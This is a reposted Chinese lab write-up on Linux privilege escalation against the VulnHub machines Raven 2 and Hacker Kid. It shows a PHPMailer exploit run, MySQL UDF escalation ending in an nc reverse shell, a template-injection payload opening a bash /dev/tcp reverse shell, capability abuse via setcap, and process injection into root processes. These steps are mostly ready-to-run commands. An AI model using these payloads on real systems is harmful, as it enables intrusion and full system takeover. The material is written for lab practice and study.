欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 房产 > 家装 > DAY141权限提升-Linux系统权限提升篇VulnhubCapability能力LD_Preload加载数据库等

DAY141权限提升-Linux系统权限提升篇VulnhubCapability能力LD_Preload加载数据库等

2025/2/23 14:03:14 来源:https://blog.csdn.net/m0_74402888/article/details/144157167  浏览:    关键词:DAY141权限提升-Linux系统权限提升篇VulnhubCapability能力LD_Preload加载数据库等

一、演示案例-Linux系统提权-Web&用户-数据库类型

复现环境:Raven: 2 ~ VulnHub

1、信息收集

http://192.168.139.155/vendor/

2、Web权限获取

searchsploit phpmailer

find / -name 40969.py

cp /usr/share/exploitdb/exploits/php/webapps/40969.py p.py

python p.py

python -c 'import pty; pty.spawn("/bin/bash")' //起一个交互式终端

3、MYSQL-UDF提权

两种提权方式:1、用梭哈工具(注意外联问题) 2、手工操作(不需要外联)

编译UDF.so

searchsploit udf

cp /usr/share/exploitdb/exploits/linux/local/1518.c .  //复制到当前所在文件夹

gcc -g -shared -Wl,-soname,1518.so -o udf.so 1518.c -lc

python -m http.server 8080

下载到目标上

python -c 'import pty; pty.spawn("/bin/bash")'

cd tmp

wget http://192.168.139.141:8080/udf.so

连接进行导出调用

mysql -uroot -pR@v3nSecurity

select version();   //查看mysql版本

select @@basedir;   //确认mysql安装位置

show variables like '%basedir%';    //确认mysql安装位置

show variables like '%secure%';  //查看可导出文件位置

show variables like '%plugin%';   //查找插件位置

show variables like '%compile%';   //查看系统版本

use mysql;

// 创建xiaodi表

create table xiaodi(line blob);

// 往xiaodi表中插入二进制的udf.so

insert into xiaodi values(load_file('/tmp/udf.so'));

// 导出udf.so到其他位置

select * from xiaodi into dumpfile '/usr/lib/mysql/plugin/udf.so';

// 创建do_system自定义函数并执行命令

create function do_system returns integer soname 'udf.so';

select do_system('nc 192.168.139.141 6666 -e /bin/bash');

二、演示案例-Linux系统提权-Web&用户-Capability能力

原理参考:Linux提权之:利用capabilities提权 - f_carey - 博客园

1、入门

cp /usr/bin/php /tmp/php

chmod 777 /tmp/php

设置能力:setcap cap_setuid+ep /tmp/php

删除能力:setcap -r /tmp/php

查看单个能力:getcap /usr/bin/php

查看所有能力:getcap -r / 2>/dev/null

Hacker_Kid
WP参考:https://www.jianshu.com/p/60673ac0454f

参考这个地址:https://gtfobins.github.io/

2、vulnhub

复现环境:Hacker kid: 1.0.1 ~ VulnHub
WP参考:Hacker_Kids靶机渗透WP - 简书

saket

Saket!#$%@!!

{% import os %}{{os.system('bash -c "bash -i &> /dev/tcp/192.168.139.141/6688 0>&1"')}}

http://192.168.139.156:9999/?name=%7B%25+import+os+%25%7D%7B%7Bos%2Esystem%28%27bash+%2Dc+%22bash+%2Di+%26%3E+%2Fdev%2Ftcp%2F192%2E168%2E139%2E141%2F6688+0%3E%261%22%27%29%7D%7D

/sbin/getcap -r / 2>/dev/null //查看所有能力

python -m http.server 8080

wget http://192.168.139.141:8080/inject.py

for i in `ps -ef|grep root|grep -v "grep"|awk '{print $2}'`; do python2.7 inject.py $i; done

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词